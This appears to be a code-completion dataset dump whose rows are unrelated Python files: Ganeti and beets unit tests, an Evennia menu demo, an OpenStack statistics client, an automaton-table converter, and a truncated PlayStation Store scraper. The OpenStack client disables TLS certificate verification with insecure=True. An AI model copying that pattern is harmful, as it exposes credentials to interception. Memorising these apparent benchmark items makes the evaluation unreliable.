gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
#!/usr/bin/python
#
# Copyright (C) 2009 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for unittesting the confd client module"""
import socket
import unittest
from ganeti import confd
from ganeti import constants
from ganeti import errors
import ganeti.confd.client
import testutils
class ResettableMock(object):
def __init__(self, *args, **kwargs):
self.Reset()
def Reset(self):
pass
class MockLogger(ResettableMock):
def Reset(self):
self.debug_count = 0
self.warn_count = 0
self.error_count = 0
def debug(string):
self.debug_count += 1
def warning(string):
self.warn_count += 1
def error(string):
self.error_count += 1
class MockConfdAsyncUDPClient(ResettableMock):
def Reset(self):
self.send_count = 0
self.last_address = ''
self.last_port = -1
self.last_sent = ''
def enqueue_send(self, address, port, payload):
self.send_count += 1
self.last_payload = payload
self.last_port = port
self.last_address = address
class MockCallback(ResettableMock):
def Reset(self):
self.call_count = 0
self.last_up = None
def __call__(self, up):
"""Callback
@type up: L{ConfdUpcallPayload}
@param up: upper callback
"""
self.call_count += 1
self.last_up = up
class MockTime(ResettableMock):
def Reset(self):
self.mytime = 1254213006.5175071
def time(self):
return self.mytime
def increase(self, delta):
self.mytime += delta
class _BaseClientTest:
"""Base class for client tests"""
mc_list = None
new_peers = None
family = None
def setUp(self):
self.mock_time = MockTime()
confd.client.time = self.mock_time
confd.client.ConfdAsyncUDPClient = MockConfdAsyncUDPClient
self.logger = MockLogger()
hmac_key = "mykeydata"
self.callback = MockCallback()
self.client = confd.client.ConfdClient(hmac_key, self.mc_list,
self.callback, logger=self.logger)
def testRequest(self):
req1 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.assertNotEqual(req1.rsalt, req2.rsalt)
self.assertEqual(req1.protocol, constants.CONFD_PROTOCOL_VERSION)
self.assertEqual(req2.protocol, constants.CONFD_PROTOCOL_VERSION)
self.assertRaises(errors.ConfdClientError, confd.client.ConfdClientRequest,
type=-33)
def testClientSend(self):
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
# Cannot send the same request twice
self.assertRaises(errors.ConfdClientError, self.client.SendRequest, req)
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
# Coverage is too big
self.assertRaises(errors.ConfdClientError, self.client.SendRequest,
req2, coverage=15)
self.assertEquals(self.client._socket.send_count,
constants.CONFD_DEFAULT_REQ_COVERAGE)
# Send with max coverage
self.client.SendRequest(req2, coverage=-1)
self.assertEquals(self.client._socket.send_count,
constants.CONFD_DEFAULT_REQ_COVERAGE + len(self.mc_list))
self.assert_(self.client._socket.last_address in self.mc_list)
def testClientExpire(self):
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
# Make a couple of seconds pass ;)
self.mock_time.increase(2)
# Now sending the second request
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req2)
self.mock_time.increase(constants.CONFD_CLIENT_EXPIRE_TIMEOUT - 1)
# First request should be expired, second one should not
self.client.ExpireRequests()
self.assertEquals(self.callback.call_count, 1)
self.assertEquals(self.callback.last_up.type, confd.client.UPCALL_EXPIRE)
self.assertEquals(self.callback.last_up.salt, req.rsalt)
self.assertEquals(self.callback.last_up.orig_request, req)
self.mock_time.increase(3)
self.assertEquals(self.callback.call_count, 1)
self.client.ExpireRequests()
self.assertEquals(self.callback.call_count, 2)
self.assertEquals(self.callback.last_up.type, confd.client.UPCALL_EXPIRE)
self.assertEquals(self.callback.last_up.salt, req2.rsalt)
self.assertEquals(self.callback.last_up.orig_request, req2)
def testClientCascadeExpire(self):
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
self.mock_time.increase(constants.CONFD_CLIENT_EXPIRE_TIMEOUT +1)
req2 = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req2)
self.assertEquals(self.callback.call_count, 1)
def testUpdatePeerList(self):
self.client.UpdatePeerList(self.new_peers)
self.assertEquals(self.client._peers, self.new_peers)
req = confd.client.ConfdClientRequest(type=constants.CONFD_REQ_PING)
self.client.SendRequest(req)
self.assertEquals(self.client._socket.send_count, len(self.new_peers))
self.assert_(self.client._socket.last_address in self.new_peers)
def testSetPeersFamily(self):
self.client._SetPeersAddressFamily()
self.assertEquals(self.client._family, self.family)
mixed_peers = ["192.0.2.99", "2001:db8:beef::13"]
self.client.UpdatePeerList(mixed_peers)
self.assertRaises(errors.ConfdClientError,
self.client._SetPeersAddressFamily)
class TestIP4Client(unittest.TestCase, _BaseClientTest):
"""Client tests"""
mc_list = ["192.0.2.1",
"192.0.2.2",
"192.0.2.3",
"192.0.2.4",
"192.0.2.5",
"192.0.2.6",
"192.0.2.7",
"192.0.2.8",
"192.0.2.9",
]
new_peers = ["198.51.100.1", "198.51.100.2"]
family = socket.AF_INET
def setUp(self):
unittest.TestCase.setUp(self)
_BaseClientTest.setUp(self)
class TestIP6Client(unittest.TestCase, _BaseClientTest):
"""Client tests"""
mc_list = ["2001:db8::1",
"2001:db8::2",
"2001:db8::3",
"2001:db8::4",
"2001:db8::5",
"2001:db8::6",
"2001:db8::7",
"2001:db8::8",
"2001:db8::9",
]
new_peers = ["2001:db8:beef::11", "2001:db8:beef::12"]
family = socket.AF_INET6
def setUp(self):
unittest.TestCase.setUp(self)
_BaseClientTest.setUp(self)
if __name__ == "__main__":
testutils.GanetiTestProgram()
|
|
# -------------------------------------------------------------
#
# test menu strucure and testing command
#
# -------------------------------------------------------------
import random
def _generate_goto(caller, **kwargs):
return kwargs.get("name", "test_dynamic_node"), {"name": "replaced!"}
def test_start_node(caller):
menu = caller.ndb._menutree
text = """
This is an example menu.
If you enter anything except the valid options, your input will be
recorded and you will be brought to a menu entry showing your
input.
Select options or use 'quit' to exit the menu.
The menu was initialized with two variables: %s and %s.
""" % (
menu.testval,
menu.testval2,
)
options = (
{
"key": ("|yS|net", "s"),
"desc": "Set an attribute on yourself.",
"exec": lambda caller: caller.attributes.add("menuattrtest", "Test value"),
"goto": "test_set_node",
},
{
"key": ("|yL|nook", "l"),
"desc": "Look and see a custom message.",
"goto": "test_look_node",
},
{"key": ("|yV|niew", "v"), "desc": "View your own name", "goto": "test_view_node"},
{
"key": ("|yD|nynamic", "d"),
"desc": "Dynamic node",
"goto": (_generate_goto, {"name": "test_dynamic_node"}),
},
{
"key": ("|yQ|nuit", "quit", "q", "Q"),
"desc": "Quit this menu example.",
"goto": "test_end_node",
},
{"key": "_default", "goto": "test_displayinput_node"},
)
return text, options
def test_look_node(caller):
text = "This is a custom look location!"
options = {
"key": ("|yL|nook", "l"),
"desc": "Go back to the previous menu.",
"goto": "test_start_node",
}
return text, options
def test_set_node(caller):
text = (
"""
The attribute 'menuattrtest' was set to
|w%s|n
(check it with examine after quitting the menu).
This node's has only one option, and one of its key aliases is the
string "_default", meaning it will catch any input, in this case
to return to the main menu. So you can e.g. press <return> to go
back now.
"""
% caller.db.menuattrtest, # optional help text for this node
"""
This is the help entry for this node. It is created by returning
the node text as a tuple - the second string in that tuple will be
used as the help text.
""",
)
options = {"key": ("back (default)", "_default"), "goto": "test_start_node"}
return text, options
def test_view_node(caller, **kwargs):
text = (
"""
Your name is |g%s|n!
click |lclook|lthere|le to trigger a look command under MXP.
This node's option has no explicit key (nor the "_default" key
set), and so gets assigned a number automatically. You can infact
-always- use numbers (1...N) to refer to listed options also if you
don't see a string option key (try it!).
"""
% caller.key
)
if kwargs.get("executed_from_dynamic_node", False):
# we are calling this node as a exec, skip return values
caller.msg("|gCalled from dynamic node:|n \n {}".format(text))
return
else:
options = {"desc": "back to main", "goto": "test_start_node"}
return text, options
def test_displayinput_node(caller, raw_string):
text = (
"""
You entered the text:
"|w%s|n"
... which could now be handled or stored here in some way if this
was not just an example.
This node has an option with a single alias "_default", which
makes it hidden from view. It catches all input (except the
in-menu help/quit commands) and will, in this case, bring you back
to the start node.
"""
% raw_string.rstrip()
)
options = {"key": "_default", "goto": "test_start_node"}
return text, options
def _test_call(caller, raw_input, **kwargs):
mode = kwargs.get("mode", "exec")
caller.msg(
"\n|y'{}' |n_test_call|y function called with\n "
'caller: |n{}\n |yraw_input: "|n{}|y" \n kwargs: |n{}\n'.format(
mode, caller, raw_input.rstrip(), kwargs
)
)
if mode == "exec":
kwargs = {"random": random.random()}
caller.msg("function modify kwargs to {}".format(kwargs))
else:
caller.msg("|ypassing function kwargs without modification.|n")
return "test_dynamic_node", kwargs
def test_dynamic_node(caller, **kwargs):
text = """
This is a dynamic node with input:
{}
""".format(
kwargs
)
options = (
{
"desc": "pass a new random number to this node",
"goto": ("test_dynamic_node", {"random": random.random()}),
},
{
"desc": "execute a func with kwargs",
"exec": (_test_call, {"mode": "exec", "test_random": random.random()}),
},
{"desc": "dynamic_goto", "goto": (_test_call, {"mode": "goto", "goto_input": "test"})},
{
"desc": "exec test_view_node with kwargs",
"exec": ("test_view_node", {"executed_from_dynamic_node": True}),
"goto": "test_dynamic_node",
},
{"desc": "back to main", "goto": "test_start_node"},
)
return text, options
def test_end_node(caller):
text = """
This is the end of the menu and since it has no options the menu
will exit here, followed by a call of the "look" command.
"""
return text, None
# class CmdTestMenu(Command):
# """
# Test menu
#
# Usage:
# testmenu <menumodule>
#
# Starts a demo menu from a menu node definition module.
#
# """
#
# key = "testmenu"
#
# def func(self):
#
# if not self.args:
# self.caller.msg("Usage: testmenu menumodule")
# return
# # start menu
# EvMenu(
# self.caller,
# self.args.strip(),
# startnode="test_start_node",
# persistent=True,
# cmdset_mergetype="Replace",
# testval="val",
# testval2="val2",
# )
#
|
|
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from cinderclient import client as cinder_client
from keystoneclient import discover as keystone_discover
from keystoneclient.v2_0 import client as keystone_client_v2
from keystoneclient.v3 import client as keystone_client_v3
from novaclient import client as nova_client
from nailgun import consts
from nailgun.db import db
from nailgun.logger import logger
from nailgun import objects
from nailgun.settings import settings
from nailgun.statistics.oswl.resources_description \
import resources_description
from nailgun.statistics import utils
class ClientProvider(object):
"""Initialize clients for OpenStack component and expose them as attrs"""
clients_version_attr_path = {
"nova": ["client", "version"],
"cinder": ["client", "version"],
"keystone": ["version"]
}
def __init__(self, cluster):
self.cluster = cluster
self._nova = None
self._cinder = None
self._keystone = None
self._credentials = None
@property
def nova(self):
if self._nova is None:
self._nova = nova_client.Client(
settings.OPENSTACK_API_VERSION["nova"],
*self.credentials,
service_type=consts.NOVA_SERVICE_TYPE.compute,
insecure=True
)
return self._nova
@property
def cinder(self):
if self._cinder is None:
self._cinder = cinder_client.Client(
settings.OPENSTACK_API_VERSION["cinder"],
*self.credentials,
insecure=True
)
return self._cinder
@property
def keystone(self):
if self._keystone is None:
# kwargs are universal for v2 and v3 versions of
# keystone client that are different only in accepting
# of tenant/project keyword name
auth_kwargs = {
"username": self.credentials[0],
"password": self.credentials[1],
"tenant_name": self.credentials[2],
"project_name": self.credentials[2],
"auth_url": self.credentials[3]
}
self._keystone = self._get_keystone_client(auth_kwargs)
return self._keystone
def _get_keystone_client(self, auth_creds):
"""Create client based on returned from keystone server version data.
:param auth_creds: credentials for authentication which also are
parameters for client's instance initialization
:returns: instance of keystone client of appropriate version
:raises: exception if response from server contains version other than
2.x and 3.x
"""
discover = keystone_discover.Discover(**auth_creds)
for version_data in discover.version_data():
version = version_data["version"][0]
if version <= 2:
return keystone_client_v2.Client(insecure=True, **auth_creds)
elif version == 3:
return keystone_client_v3.Client(insecure=True, **auth_creds)
raise Exception("Failed to discover keystone version "
"for auth_url {0}".format(
auth_creds.get("auth_url"))
)
@property
def credentials(self):
if self._credentials is None:
cluster_attrs_editable = \
objects.Cluster.get_editable_attributes(self.cluster)
access_data = cluster_attrs_editable.get("workloads_collector")
if not access_data:
# in case there is no section for workloads_collector
# in cluster attributes we try to fallback here to
# default credential for the cluster. It is not 100%
# foolproof as user might have changed them at this time
access_data = cluster_attrs_editable["access"]
os_user = access_data["user"]["value"]
os_password = access_data["password"]["value"]
os_tenant = access_data["tenant"]["value"]
auth_host = utils.get_mgmt_ip_of_cluster_controller(self.cluster)
auth_url = "http://{0}:{1}/{2}/".format(
auth_host, settings.AUTH_PORT,
settings.OPENSTACK_API_VERSION["keystone"])
self._credentials = (os_user, os_password, os_tenant, auth_url)
return self._credentials
def get_info_from_os_resource_manager(client_provider, resource_name):
"""Use OpenStack resource manager to retrieve information about resource
Utilize clients provided by client_provider instance to retrieve
data for resource_name, description of which is stored in
resources_description data structure.
:param client_provider: objects that provides instances of openstack
clients as its attributes
:param resource_name: string that contains name of resource for which
info should be collected from installation
:returns: data that store collected info
"""
resource_description = resources_description[resource_name]
client_name = resource_description["retrieved_from_component"]
client_inst = getattr(client_provider, client_name)
client_api_version = utils.get_nested_attr(
client_inst,
client_provider.clients_version_attr_path[client_name]
)
matched_api = \
resource_description["supported_api_versions"][client_api_version]
resource_manager_name = matched_api["resource_manager_name"]
resource_manager = getattr(client_inst, resource_manager_name)
attributes_white_list = matched_api["attributes_white_list"]
additional_display_options = \
matched_api.get("additional_display_options", {})
resource_info = _get_data_from_resource_manager(
resource_manager,
attributes_white_list,
additional_display_options
)
return resource_info
def _get_data_from_resource_manager(resource_manager, attrs_white_list_rules,
additional_display_options):
data = []
display_options = {}
display_options.update(additional_display_options)
instances_list = resource_manager.list(**display_options)
for inst in instances_list:
inst_details = {}
obj_dict = \
inst.to_dict() if hasattr(inst, "to_dict") else inst.__dict__
for rule in attrs_white_list_rules:
try:
inst_details[rule.map_to_name] = utils.get_attr_value(
rule.path, rule.transform_func, obj_dict
)
except KeyError:
# in case retrieved attribute is highlevel key
# and is not present in obj_dict KeyError occurs which
# cannot be handled by get_attr_value function due to
# its features so we must do it here in order
# to prevent from situation when whole set data is not
# collected for particular resource
logger.info("{0} cannot be collected for the statistic "
"as attribute with path {1} is not present in the "
"resource manager's data".format(rule.map_to_name,
rule.path))
data.append(inst_details)
return data
def delete_expired_oswl_entries():
try:
deleted_rows_count = \
objects.OpenStackWorkloadStatsCollection.clean_expired_entries()
if deleted_rows_count == 0:
logger.info("There are no expired OSWL entries in db.")
db().commit()
logger.info("Expired OSWL entries are "
"successfully cleaned from db")
except Exception as e:
logger.exception("Exception while cleaning oswls entries from "
"db. Details: {0}".format(six.text_type(e)))
finally:
db.remove()
|
|
import collections
import csv
from . import machines
from . import syntax
__all__ = ['Table', 'from_table', 'read_csv', 'read_excel', 'to_table']
class Table:
"""A simple class that just stores a list of lists of strings.
Arguments:
rows: list of lists of strings
num_header_rows (int): number of header rows
num_header_cols (int): number of header columns
"""
def __init__(self, rows, num_header_cols=1, num_header_rows=1):
self.rows = rows #: The table contents
self.num_header_cols = num_header_cols #: Number of header rows
self.num_header_rows = num_header_rows #: Number of header columns
def __getitem__(self, i):
return self.rows[i]
def __len__(self):
return len(self.rows)
def _repr_html_(self):
result = []
result.append('<table style="font-family: Courier, monospace;">')
for i, row in enumerate(self.rows):
result.append(' <tr>')
for j, cell in enumerate(row):
cell = cell.replace('&', 'ε')
cell = cell.replace('>', '>')
if i < self.num_header_rows or j < self.num_header_cols:
result.append(f' <th style="text-align: left">{cell}</th>')
else:
result.append(f' <td style="text-align: left">{cell}</td>')
result.append(' </tr>')
result.append('</table>')
return '\n'.join(result)
def addr(i, j):
return chr(ord('A')+j) + str(i+1)
def from_table(table):
"""Convert a `Table` to a `Machine`.
Example:
+------+------+------+------+------+------+------+
| | 0 | | 1 | | & | |
+------+------+------+------+------+------+------+
| | 0 | & | 1 | & | $ | & |
+======+======+======+======+======+======+======+
| >@q1 | | | | | | q2,$ |
+------+------+------+------+------+------+------+
| q2 | | q2,0 | | q2,1 | | q3,& |
+------+------+------+------+------+------+------+
| q3 | q3,& | | q3,& | | q4,& | |
+------+------+------+------+------+------+------+
| @q4 | | | | | | |
+------+------+------+------+------+------+------+
The first two rows, because they have empty first cells, are
assumed to be header rows.
In a header row, cells "fill" to the right. In the above example,
the first row effectively has cells 0, 0, 1, 1, &, &.
"""
start_state = None
accept_states = set()
transitions = []
header = True
lhs2 = []
for i, row in enumerate(table):
# Skip totally blank rows
if all(cell.strip() == '' for cell in row):
continue
# Header rows are rows whose first cell is empty
if header and row[0].strip() != '':
header = False
if header:
# Header rows have lhs values for all stores other than the first
c = None
for j, cell in enumerate(row[1:], 1):
try:
if cell.strip() == '':
# Empty headings copy from the previous heading
if c is None:
raise ValueError('missing header')
else:
c = tuple(syntax.str_to_config(cell))
except Exception as e:
e.message = f"cell {addr(i,j)}: {e.message}"
raise
while j-1 >= len(lhs2):
lhs2.append(())
lhs2[j-1] += c
else:
# First cell has lhs value for the first store
try:
q, attrs = syntax.str_to_state(row[0])
if attrs.get('start', False):
if start_state is not None:
raise ValueError("more than one start state")
start_state = q
if attrs.get('accept', False):
accept_states.add(q)
lhs1 = ([q],)
except Exception as e:
e.message = f"cell {addr(i,0)}: {e.message}"
raise
# Rest of row has right-hand sides
if len(row[1:]) != len(lhs2):
raise ValueError(f"row {i+1}: row has wrong number of cells")
for j, cell in enumerate(row[1:], 1):
try:
for rhs in syntax.str_to_configs(cell):
transitions.append((lhs1+lhs2[j-1], rhs))
except Exception as e:
e.message = f"cell {addr(i,j)}: {e.message}"
raise
if start_state is None:
raise ValueError("missing start state")
return machines.from_transitions(transitions, start_state, accept_states)
def read_csv(filename):
"""Reads a CSV file containing a tabular description of a transition
function (see `from_table`).
"""
with open(filename) as file:
table = list(csv.reader(file))
m = from_table(table)
return m
def read_excel(filename, sheet=None):
"""Reads an Excel file containing a tabular description of a
transition function (see `from_table`).
"""
from openpyxl import load_workbook # type: ignore
wb = load_workbook(filename)
if sheet is None:
ws = wb.active
else:
ws = wb.get_sheet_by_name(sheet)
table = [[cell.value or "" for cell in row] for row in ws.rows]
return from_table(table)
def to_table(m):
"""Converts a `Machine` to a `Table`."""
rows = []
states = set()
initial_state = m.get_start_state()
final_states = m.get_accept_states()
conditions = set()
transitions = collections.defaultdict(list)
for t in m.get_transitions():
state = t[m.state]
[[q]] = state.lhs
[[r]] = state.rhs
t = t[:m.state] + t[m.state+1:]
lhs = tuple(t.lhs)
rhs = (r,)+tuple(t.rhs)
states.add(q)
conditions.add(lhs)
transitions[q,lhs].append(rhs)
states.update(final_states)
conditions = sorted(conditions)
num_header_rows = len(conditions[0])
for j in range(num_header_rows):
row = ['']
prev = None
for condition in conditions:
row.append(str(condition[j]) if condition[j] != prev else '')
prev = condition[j]
rows.append(row)
for q in sorted(states):
row = []
qstring = q
if q in final_states:
qstring = "@" + qstring
if q == initial_state:
qstring = ">" + qstring
row.append(qstring)
for condition in conditions:
row.append(syntax.configs_to_str(transitions[q,condition]))
rows.append(row)
return Table(rows, num_header_rows=num_header_rows)
|
|
# This file is part of beets.
# Copyright 2016, Fabrice Laporte.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'lastgenre' plugin."""
import unittest
from unittest.mock import Mock
from test import _common
from beetsplug import lastgenre
from beets import config
from test.helper import TestHelper
class LastGenrePluginTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.plugin = lastgenre.LastGenrePlugin()
def tearDown(self):
self.teardown_beets()
def _setup_config(self, whitelist=False, canonical=False, count=1,
prefer_specific=False):
config['lastgenre']['canonical'] = canonical
config['lastgenre']['count'] = count
config['lastgenre']['prefer_specific'] = prefer_specific
if isinstance(whitelist, (bool, (str,))):
# Filename, default, or disabled.
config['lastgenre']['whitelist'] = whitelist
self.plugin.setup()
if not isinstance(whitelist, (bool, (str,))):
# Explicit list of genres.
self.plugin.whitelist = whitelist
def test_default(self):
"""Fetch genres with whitelist and c14n deactivated
"""
self._setup_config()
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues')
def test_c14n_only(self):
"""Default c14n tree funnels up to most common genre except for *wrong*
genres that stay unchanged.
"""
self._setup_config(canonical=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'Iota Blues')
def test_whitelist_only(self):
"""Default whitelist rejects *wrong* (non existing) genres.
"""
self._setup_config(whitelist=True)
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_whitelist_c14n(self):
"""Default whitelist and c14n both activated result in all parents
genres being selected (from specific to common).
"""
self._setup_config(canonical=True, whitelist=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues, Blues')
def test_whitelist_custom(self):
"""Keep only genres that are in the whitelist.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(['pop', 'blues']),
'Blues')
self._setup_config(canonical='', whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_count(self):
"""Keep the n first genres, as we expect them to be sorted from more to
less popular.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'rock', 'blues']),
'Jazz, Rock')
def test_count_c14n(self):
"""Keep the n first genres, after having applied c14n when necessary
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
canonical=True,
count=2)
# thanks to c14n, 'blues' superseeds 'country blues' and takes the
# second slot
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'country blues', 'rock']),
'Jazz, Blues')
def test_c14n_whitelist(self):
"""Genres first pass through c14n and are then filtered
"""
self._setup_config(canonical=True, whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_empty_string_enables_canonical(self):
"""For backwards compatibility, setting the `canonical` option
to the empty string enables it using the default tree.
"""
self._setup_config(canonical='', count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
def test_empty_string_enables_whitelist(self):
"""Again for backwards compatibility, setting the `whitelist`
option to the empty string enables the default set of genres.
"""
self._setup_config(whitelist='')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_prefer_specific_loads_tree(self):
"""When prefer_specific is enabled but canonical is not the
tree still has to be loaded.
"""
self._setup_config(prefer_specific=True, canonical=False)
self.assertNotEqual(self.plugin.c14n_branches, [])
def test_prefer_specific_without_canonical(self):
"""Prefer_specific works without canonical.
"""
self._setup_config(prefer_specific=True, canonical=False, count=4)
self.assertEqual(self.plugin._resolve_genres(
['math rock', 'post-rock']),
'Post-Rock, Math Rock')
def test_no_duplicate(self):
"""Remove duplicated genres.
"""
self._setup_config(count=99)
self.assertEqual(self.plugin._resolve_genres(['blues', 'blues']),
'Blues')
def test_tags_for(self):
class MockPylastElem:
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
class MockPylastObj:
def get_top_tags(self):
tag1 = Mock()
tag1.weight = 90
tag1.item = MockPylastElem('Pop')
tag2 = Mock()
tag2.weight = 40
tag2.item = MockPylastElem('Rap')
return [tag1, tag2]
plugin = lastgenre.LastGenrePlugin()
res = plugin._tags_for(MockPylastObj())
self.assertEqual(res, ['pop', 'rap'])
res = plugin._tags_for(MockPylastObj(), min_weight=50)
self.assertEqual(res, ['pop'])
def test_get_genre(self):
mock_genres = {'track': '1', 'album': '2', 'artist': '3'}
def mock_fetch_track_genre(self, obj=None):
return mock_genres['track']
def mock_fetch_album_genre(self, obj):
return mock_genres['album']
def mock_fetch_artist_genre(self, obj):
return mock_genres['artist']
lastgenre.LastGenrePlugin.fetch_track_genre = mock_fetch_track_genre
lastgenre.LastGenrePlugin.fetch_album_genre = mock_fetch_album_genre
lastgenre.LastGenrePlugin.fetch_artist_genre = mock_fetch_artist_genre
self._setup_config(whitelist=False)
item = _common.item()
item.genre = mock_genres['track']
config['lastgenre'] = {'force': False}
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'keep'))
config['lastgenre'] = {'force': True, 'source': 'track'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['track'], 'track'))
config['lastgenre'] = {'source': 'album'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['album'], 'album'))
config['lastgenre'] = {'source': 'artist'}
res = self.plugin._get_genre(item)
self.assertEqual(res, (mock_genres['artist'], 'artist'))
mock_genres['artist'] = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (item.genre, 'original'))
config['lastgenre'] = {'fallback': 'rap'}
item.genre = None
res = self.plugin._get_genre(item)
self.assertEqual(res, (config['lastgenre']['fallback'].get(),
'fallback'))
def test_sort_by_depth(self):
self._setup_config(canonical=True)
# Normal case.
tags = ('electronic', 'ambient', 'post-rock', 'downtempo')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(
res, ['post-rock', 'downtempo', 'ambient', 'electronic'])
# Non-canonical tag ('chillout') present.
tags = ('electronic', 'ambient', 'chillout')
res = self.plugin._sort_by_depth(tags)
self.assertEqual(res, ['ambient', 'electronic'])
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
|
'''
Retrieve game list (by Requests).
Update log: (date / version / author : comments)
2020-07-10 / 1.0.0 / Du Jiang : Creation
Notes:
1. It requires 3rd parth python lib (at least): requests.
'''
import csv
import getopt
from http import HTTPStatus
import json
import sys
from time import localtime, strftime, time
import requests
# Global variables.
# The value can be updated by command line options.
__data_type = None
__output_file_path = None
__PAGE_SIZE = 99
def check_url(url):
'''
Use requests to get URL, and return HTTP status code.
@param url: A string of URL.
@return: HTTP response status code, or None if request failed.
@return: Parsed HTTP response, or None if request failed.
'''
print("url =", url)
status_code = None
json_data = None
try:
response = requests.get(url, timeout = 10)
# print("response =", response)
print("response.status_code =", response.status_code)
if response.history:
status_code = HTTPStatus.OK
print("response.status_code (Due to redirected) =", status_code)
else:
status_code = response.status_code
response.raise_for_status()
json_data = json.loads(response.text)
except Exception as e:
print("Check url failed. Exception = {0}".format(e))
raise e
return status_code, json_data
def parse_data(json_data):
'''
@param json_data : JSON data.
@return Records, a list of lists.
@return Count of raw records.
'''
records = []
game_list = json_data["included"]
for game_info in game_list:
if game_info["type"] == "game":
game_details = game_info["attributes"]
if "skus" not in game_details:
continue
game_skus = game_details["skus"]
if len(game_skus) == 0:
continue
if "name" in game_skus[0]:
game_subname = game_skus[0]["name"].encode('ascii', errors = 'ignore').decode()
else:
game_subname = ""
game_prices = game_skus[0]["prices"]
game_prices_plus = game_prices["plus-user"]
game_name = game_details["name"].encode('ascii', errors = 'ignore').decode()
game_name_normalized = game_name.replace(" -", ":").strip() + " "
platforms = "/".join(game_details["platforms"]).encode('ascii', errors = 'ignore').decode()
genres = "/".join(game_details["genres"]).encode('ascii', errors = 'ignore').decode()
record = [ game_name, game_subname, game_details["provider-name"], genres, platforms, game_details["release-date"],
game_prices_plus["actual-price"]["display"], game_prices_plus["actual-price"]["value"], game_prices_plus["discount-percentage"],
game_prices_plus["availability"]["start-date"] if game_prices_plus["discount-percentage"] > 0 else "",
game_prices_plus["availability"]["end-date"] if game_prices_plus["discount-percentage"] > 0 else "",
game_details["game-content-type"], game_info["id"], game_details["thumbnail-url-base"], game_name_normalized]
records.append(record)
return records, len(game_list)
def process():
print("-" * 100)
time_str = strftime("%Y-%m-%d %H:%M:%S", localtime(time()))
print("Start time =", time_str)
url = "https://store.playstation.com/valkyrie-api/en/SG/19/container/STORE-MSF86012-GAMESALL?game_content_type=games%2Cbundles&sort=name&direction=asc"
if __data_type == 1:
url = url + "&platform=ps4"
url = url + "&size={0}&start={1}"
headers = ["Name", "SubName", "Provider", "Genres", "Platforms", "ReleaseDate",
"DisplayPrice", "PriceValue", "DiscountPercent", "DiscountFromDate", "DiscountToDate",
